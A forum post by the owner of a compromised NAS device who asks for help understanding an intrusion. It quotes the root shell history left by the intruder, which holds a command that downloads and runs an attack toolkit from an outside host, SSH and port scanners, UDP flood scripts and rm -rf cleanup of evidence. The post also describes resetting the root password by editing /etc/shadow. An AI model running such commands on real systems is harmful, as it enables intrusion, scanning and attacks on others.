Hi,
Since few days I can't access anymore to my MBWE with the root account. I was really suprised because I was sure to use the correct password. I didn't understand.
I finaly decided to disassemble the MBWE and connect the disk to my pc under ubuntu with a SATA-USB cable.
I have change the /etc/shadow line for root to leave an empty password and restart my MBWE.
Everything works find as before.
I try to connect root and I was surprised to see that my folder /root/script didn't exist anymore.
Only one folder remain "gosh".
[root@MyBookWorld ~]# ls -l
total 4
drwxr-xr-x 3 root root 4096 Oct 21 10:44 gosh
I tried to see what's happen during the previous connection
[root@MyBookWorld ~]# history
1 cd gosh
2 chmod +x *
3 uptime
4 ./go 186
5 ./go.sh 186
6 ./ip 190
7 ./a 186
8 rm -rf gosh
9 ls -a
10 rm -rf udp.pl.4
11 rm -rf udp.pl.`
12 rm -rf udp.pl.1
13 rm -rf udp.pl.10
14 rm -rf udp.pl.2
15 rm -rf udp.pl.3
16 rm -rf udp.pl.9
17 rm -rf go.sh
18 ls -a
19 rm -rf udp.pl
20 rm -f udp.pl6
21 rm -f udp.pl.6
22 rm -f udp.pl.5
23 rm -f udp.pl.7
24 rm -f udp.pl.8
25 ls -a
26 rm -rf vuln.txt
27 rm -rf common
28 rm -rf 1
29 rm -rf 2
30 rm -rf 3
31 rm -rf scam
32 rm -rf secure
33 rm -rf pass_file
34 ls -a
35 rm -rf 3
36 rm -rf 4
37 rm -rf 5
38 rm -rf pscan2
39 ls -a
40 rm -rf mtu.txt
41 rm -rf a
42 rm -rf ss
43 ls -a
44 rm -rf mtu.txt
45 rm -rf gen-pass
46 rm -rf ssh-scan
47 ls -a
48 wget arhive.webs . com/gosh.tgz
49 tar xzvf gosh.tgz
50 cd weed
51 chmod +x
52 chmod +x *
53 ./go 186
54 w
55 rm -rf weed
56 w
57 ls -a
58 cd /dev/shm
59 cd
I don't know what is this but I am sure I haven't done this !
Could you help me to understand and why not find who have made this !
Maybe something has been stolen or anything else.
I want to know and protect me.